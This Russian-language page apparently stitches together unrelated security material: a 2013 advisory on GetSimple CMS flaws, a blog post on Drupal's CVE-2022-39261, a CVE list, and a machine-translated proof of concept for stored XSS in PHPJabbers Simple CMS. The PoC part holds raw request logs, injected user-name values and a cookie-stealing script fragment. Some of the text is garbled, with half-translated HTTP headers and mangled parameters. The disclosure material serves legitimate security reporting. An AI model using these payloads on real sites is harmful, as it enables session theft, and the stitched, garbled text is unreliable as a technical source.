Simpla cms уязвимости: Множественные уязвимости в GetSimple CMS

Множественные уязвимости в GetSimple CMS

Дата публикации:25.06.2013
Всего просмотров:8984
Опасность:

Высокая

Наличие исправления:

Да

Количество уязвимостей:5
CVSSv2 рейтинг:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:U/RL:O/RC:C)
4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:U/RL:O/RC:C)
4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:U/RL:O/RC:C)
5 (AV:N/AC:L/Au:N/C:P/I:N/A:N/E:U/RL:O/RC:C)
10 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:U/RL:O/RC:C)
CVE ID: Нет данных

Вектор эксплуатации:Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных

Наличие эксплоита: Нет данных

Уязвимые продукты: GetSimple CMS 3. x

Уязвимые версии: GetSimple CMS версии до 3.2.1

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.



1. Уязвимость существует из-за недостаточной обработки входных данных в нескольких параметрах в нескольких сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://[host]/admin/backup-edit.php?id
http://[host]/admin/edit.php?title&menu
http://[host]/admin/filebrowser.php?returnid


2. Уязвимость существует из-за неопределенной ошибки, связанной с $LANG Settings. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.


3. Уязвимость существует из-за неопределенной ошибки, связанной с error_checking. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.


4. Уязвимость существует из-за неопределенных ошибок, связанных с frontend и ajax.php. Удаленный пользователь может с помощью символов обхода каталога раскрыть потенциально важную информацию.


5. Уязвимость существует из-за неопределенной ошибки, связанной с loadtab.php. Удаленный пользователь может скомпрометировать целевую систему.

URL производителя:
http://get-simple.info/

Решение: Установите последнюю версию 3.2.1 с сайта производителя.

Ссылки: http://get-simple.info/start/changelog
https://www.htbridge.com/advisory/HTB23141

Подпишитесь на получение последних материалов по безопасности от SecurityLab. ru —
новости, статьи, обзоры уязвимостей и мнения аналитиков.

Ежедневный выпуск от SecurityLab.Ru

Еженедельный выпуск от SecurityLab.Ru

Нажимая на кнопку, я принимаю условия соглашения.

Drupal — уязвимость CVE-2022-39261 | internet-lab.ru

  • 2 октября 2022

Снова паника в селе. В каналах по Информационной Безопасности пишут про новую уязвимость, затрагивающую шаблонизатор Twig в целом и движок CMS Drupal в частности. Уязвимы версии Drupal 8 и 9. Версия Drupal 7 не затронута. Для Drupal 8 — обновляйтесь до девятки.

Уязвимость CVE-2022-39261 (7.5 баллов по CVSS), выход за пределы каталога. Уязвимость исправлена в Twig 1.44.7, 2.15.3 и 3.4.3. И в Drupal 9.3.22 или 9.4.7.

Если кто-то предоставляет доступ к Drupal посторонним, то злоумышленник сможет получить несанкционированный доступ к конфиденциальным файлам, содержимому других файлам на сервере и ключам к базе данных. А если сервер ваш собственный и доступ к шаблонам имеете только вы, то можно продолжать попивать мохито.

Потом обновлюсь…

Ссылки

https://www.anti-malware.ru/news/2022-09-30-114534/39650

https://symfony.com/blog/twig-security-release-possibility-to-load-a-template-outside-a-configured-directory-when-using-the-filesystem-loader

https://nvd.nist.gov/vuln/detail/CVE-2022-39261

Теги

  • drupal
  • security

💰 Поддержать проект

Похожие материалы

Олег
  • 25 июля 2022
  • Подробнее о Критическая уязвимость Drupal Core — CVE-2022-25277

Для ядра Drupal выпустили исправления критической уязвимости CVE-2022-25277. Уязвимость получила 15 баллов из 25 возможных по шкале, принятой на Drupal. Возможно удалённое выполнение кода PHP.

Теги

  • security
  • web
  • drupal
Олег
  • 16 февраля 2018
  • Подробнее о Drupal 8 — удаление фотографий с помощью Fancy File Delete

В восьмом друпале работу с файлами наконец-то встроили в ядро. Однако, не все функции работы с файлами доступны по умолчанию. Вы можете загрузить файл, посмотреть, узнать в скольких местах используется один и тот же файл. Однако, функционала удаления файла нет. Вероятно, подразумевается, что файлы должны автоматически удаляться. Частично это работает, файлы со статусом «временный» автоматически удаляются кроном через 6 часов.

Теги

  • drupal
Олег
  • 31 мая 2018
  • Подробнее о Drupal 8 — страницы ошибок 404 и 403

Давайте настроим собственные страницы ошибок 403 и 404 на нашем сайте drupal 8. Имеем в виду, что в качестве web-сервера у нас выступает IIS.

Теги

  • drupal
  • IIS

Чтиво на ночь

CVE.report — Simple Cms

Ниже перечислены 1 из новейших известных уязвимостей, связанных с поставщиком Simple Cms.

Эти CVE извлекаются на основе точных совпадений с указанной информацией о поставщике (данные CPE), а также с помощью поиска по ключевым словам, чтобы обеспечить отображение новейших уязвимостей без официально указанной информации о поставщике.

Данные об известных уязвимых продуктах также отображаются на основе информации от известных CPE, каждый продукт ссылается на соответствующую страницу уязвимости.

Было обнаружено, что

CVE Сокращенное описание Серьезность Дата публикации Последнее изменение
CVE-2022-45010 Обнаружено, что веб-приложение Simple Phone Book/Directory v1. 0 содержит уязвимость SQL-инъекции через параметр editid в … 9.8 — КРИТИЧЕСКИЙ 2022-12-07 2022-12-07
CVE-2022-44960 веб-сайта 2.4p5 содержат уязвимость межсайтового скриптинга (XSS) в компоненте /general/search.php?sea… 5.4 — СРЕДНЯЯ 2022-12-02 2022-12-02
CVE-2022-44627 Уязвимость межсайтовой подделки запросов (CSRF) в плагине David Cole Simple SEO 5.4 — СРЕДНЯЯ 03.11.2022 2022-11-04
CVE-2022-44590 Аутент. (участник+) Сохраненная уязвимость межсайтового скриптинга (XSS) в плагине Simple Video Embedder Джеймса Лао 5.4 — СРЕДНЯЯ 2022-11-09 2022-11-09
CVE-2022-44151 Простая система управления запасами версии 1.0 уязвима для SQL-инъекций через /ims/login.php. 9. 8 — КРИТИЧЕСКИЙ 2022-11-30 2022-11-30
CVE-2022-43319 Уязвимость раскрытия информации в компоненте vcs/downloadFiles.php?download=./search.php Simple E-Learning Sys… 7,5 — ВЫСОКИЙ 2022-11-07 2022-11-07
CVE-2022-43230 Было обнаружено, что Simple Cold Storage Management System v1.0 содержит уязвимость SQL-инъекций через параметр id в /a… 7.2 — ВЫСОКИЙ 28.10.2022 28.10.2022
CVE-2022-43229 Было обнаружено, что Simple Cold Storage Management System v1.0 содержит уязвимость SQL-инъекций через параметр id в /b… 7.2 — ВЫСОКИЙ 28.10.2022 2022-10-31
CVE-2022-42991 Сохраненная уязвимость межсайтового скриптинга (XSS) в Simple Online Public Access Catalog v1.0 позволяет злоумышленникам выполнять произвольные. .. 5.4 — СРЕДНЯЯ 27.10.2022 27.10.2022
CVE-2022-42250 Простая система управления холодным хранилищем версии 1.0 уязвима для SQL-инъекций через /csms/admin/inquiries/view_details.php?id=. 7.2 — ВЫСОКИЙ 06.10.2022 06.10.2022
CVE-2008-0835 Уязвимость внедрения SQL-кода в indexen.php в Simple CMS 1.0.3 и более ранних версиях позволяет удаленным злоумышленникам выполнять произвольные SQL-запросы. 7,5 — ВЫСОКИЙ 20 февраля 2008 г. 15.10.2018

Популярные поисковые запросы «Simple Cms»

PHPJabbers Simple CMS 5 Межсайтовый скриптинг ≈ Packet Storm

Название документа:
===============
PHPJabbers Simple CMS v5 — постоянная уязвимость XSS

Ссылки (Источник):
================== ==
https://www.vulnerability-lab.com/get_content. php?id=2300

Дата выпуска:
=============
28.10.2021

Уязвимость Идентификатор лаборатории (VL-ID):
===================================
2300

Общий Система оценки уязвимостей:
====================================
5.4

Класс уязвимости:
====================
Межсайтовый скриптинг — постоянный

Текущая расчетная цена:
================ ========
500 € - 1.000 €

Введение продукта и услуги:
============================ ===
Простая система управления контентом на PHP для удобного редактирования и публикации веб-контента. Наш скрипт системы управления контентом PHP разработан
, чтобы предоставить вам мощные, но простые инструменты администрирования контента. Интеллектуальная CMS позволяет создавать и управлять несколькими типами веб-разделов
и легко вставляйте их на свой веб-сайт. Вы можете загружать широкий спектр файлов и добавлять пользователей с разными уровнями доступа. Получите лицензию разработчика
и настройте сценарий в соответствии со своими потребностями.

(Копия домашней страницы: https://www.phpjabbers.com/simple-cms/)

Резюме консультативной информации:
==================== ==========
Основная исследовательская группа лаборатории уязвимостей обнаружила постоянную уязвимость проверки ввода в веб-приложении PHPJabbers Simple CMS v5.0.

Затронутые продукты:
====================
PHPJabbers
Продукт: PHPJabbers Simple CMS v5.0 — (веб-приложение)

Обнаружение уязвимости Хронология:
==================================
01.09.2021: уведомление исследователя и координация (безопасность исследователь)
2021-09-02: уведомление поставщика (отдел безопасности)
2021-**-**: ответ/отзыв поставщика (отдел безопасности)
2021-**-**: исправление/исправление поставщика (группа разработчиков услуг)
2021-**-**: Подтверждение безопасности (отдел безопасности)
28. 10.2021: Публичное раскрытие информации (Лаборатория уязвимостей)

Статус обнаружения:
=================
Опубликовано

Техника эксплуатации:
====== ================
Удаленный

Уровень серьезности:
===============
Средний

Тип аутентификации:
== ==================
Ограниченная аутентификация (права модератора)

Взаимодействие с пользователем:
=================
Низкий Взаимодействие с пользователем

Тип раскрытия информации:
================
Ответственное раскрытие информации

Технические детали и описание:
====================== ==========
В веб-приложении PHPJabbers Simple CMS v5.0 обнаружена постоянная веб-уязвимость проверки ввода.
Уязвимость позволяет удаленным злоумышленникам внедрять собственные вредоносные коды сценариев с постоянным вектором атаки, чтобы
скомпрометировать браузер для запросов веб-приложения со стороны приложения.

Постоянная уязвимость обнаружена в запросе метода создания (pjActionCreate) и обновления (pjActionUpdate).
Привилегированные аутентифицированные учетные записи с доступом к пользовательскому интерфейсу могут внедрять собственный вредоносный код сценария в качестве имени для пользователей.
Выполнение кода скрипта выполняется после метода inject через post в списке пользователей (pjAdminUsers).

Успешное использование уязвимостей приводит к перехвату сеанса, постоянным фишинговым атакам, постоянным внешним перенаправлениям
на вредоносный источник и постоянным манипуляциям с уязвимыми модулями приложений.

Метод(ы) запроса:
[+] POST

Уязвимые модули:
[+] Создать (Добавить)
[+] Обновление

Уязвимые параметры:
[+] pjActionCreate
[+] pjActionUpdate

Затронутые модули:
[+] ] pjAdminUsers

Подтверждение концепции (PoC):
========================
Постоянная веб-уязвимость может быть использована удаленными злоумышленниками с привилегированными учетными записями пользователей с низким уровнем взаимодействия с пользователем.
Для демонстрации безопасности или воспроизведения уязвимости следуйте предоставленной информации и шагам ниже, чтобы продолжить.

PoC: Полезные нагрузки
">
">

--- Сеанс PoC Журналы (POST) [Добавить и обновить]
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Хост: phpjabbers-cms.localhost:8080
Принять: text/html, application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin: https://phpjabbers-cms.localhost: 8080
Connection: keep-alive
Referer: https://phpjabbers-cms.localhost: 8080/1630949262_438/index.php?controller=pjAdminUsers&action =pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084. 1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; простаяCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
[email protected]&password=test2&name=r">§ion_allow=1&file_allow=1&status=T
-
POST: HTTP /1.1 303
Сервер: Apache/2.2.15 (CentOS)
Расположение: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03 Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Хост: phpjabbers-cms.localhost:8080
Принять: text/html,application/xhtml+xml,application/xml ;q=0.9,image/webp,*/*;q=0.8
Тип контента: application/x-www-form-urlencoded
Длина контента: 180
Происхождение: https://phpjabbers-cms.localhost:8080
Соединение: keep-alive
Реферер: https://phpjabbers-cms. localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; простаяCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
[email protected]&password=test&name=r">§ion_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Сервер: Apache/2.2.15 (CentOS)
Местоположение: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive : timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Хост: phpjabbers-cms.localhost:8080
Принять: text/html,application/xhtml+xml,application/ xml;q=0,9,изображение/webp,*/*;q=0,8
Соединение: keep-alive
Referer: https://phpjabbers-cms. localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; простаяCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Сервер: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Уязвимый источник: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
class="pj-table-icon- edit"> class="pj-table-select-row"> r"> source" onload="alert(document.cookie)">
"> [email protected] class="pj-form-field pj-form-text pj-selector-editable" value= "[email protected]">06-09-2021

редактор Активный


Ссылки:
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/ index. php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action= pjActionCreate

Авторы и авторы:
==================
Лаборатория уязвимостей [Исследовательская группа] - https://www.vulnerability-lab.com/show.php ?user=Лаборатория уязвимостей

Заявление об отказе от ответственности и информация:
==========================
Информация, представленная в этом бюллетене, предоставляется без каких-либо гарантий. Лаборатория уязвимостей отказывается от всех гарантий,
явных или подразумеваемых, включая гарантии товарной пригодности и пригодности для конкретной цели. Vulnerability-Lab
или ее поставщики не несут ответственности ни в каком случае ущерба, включая прямую, косвенную, случайную, последующую потерю коммерческой прибыли
или особый ущерб, даже если Vulnerability-Lab или ее поставщики были уведомлены о возможности таких убытков. . Некоторые штаты делают
не допускает исключения или ограничения ответственности за косвенные или случайные убытки, поэтому вышеуказанное ограничение может не применяться.
Мы не одобряем и не призываем никого нарушать какие-либо лицензии, политики, искажать веб-сайты, взламывать базы данных или торговать украденными данными.

Домены: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Услуги: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Социальные сети: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Каналы: уязвимость-lab.com/rss/rss.php уязвимость-lab.com/rss/rss_upcoming.php уязвимость-lab.com/rss/rss_news.php
Программы: уязвимость-lab.com/submit.php уязвимость- lab.com/register.php weak-lab.com/list-of-bug-bounty-programs.php

Любая измененная копия или воспроизведение, включая частичное использование, этого файла требует авторизации Лаборатории уязвимостей.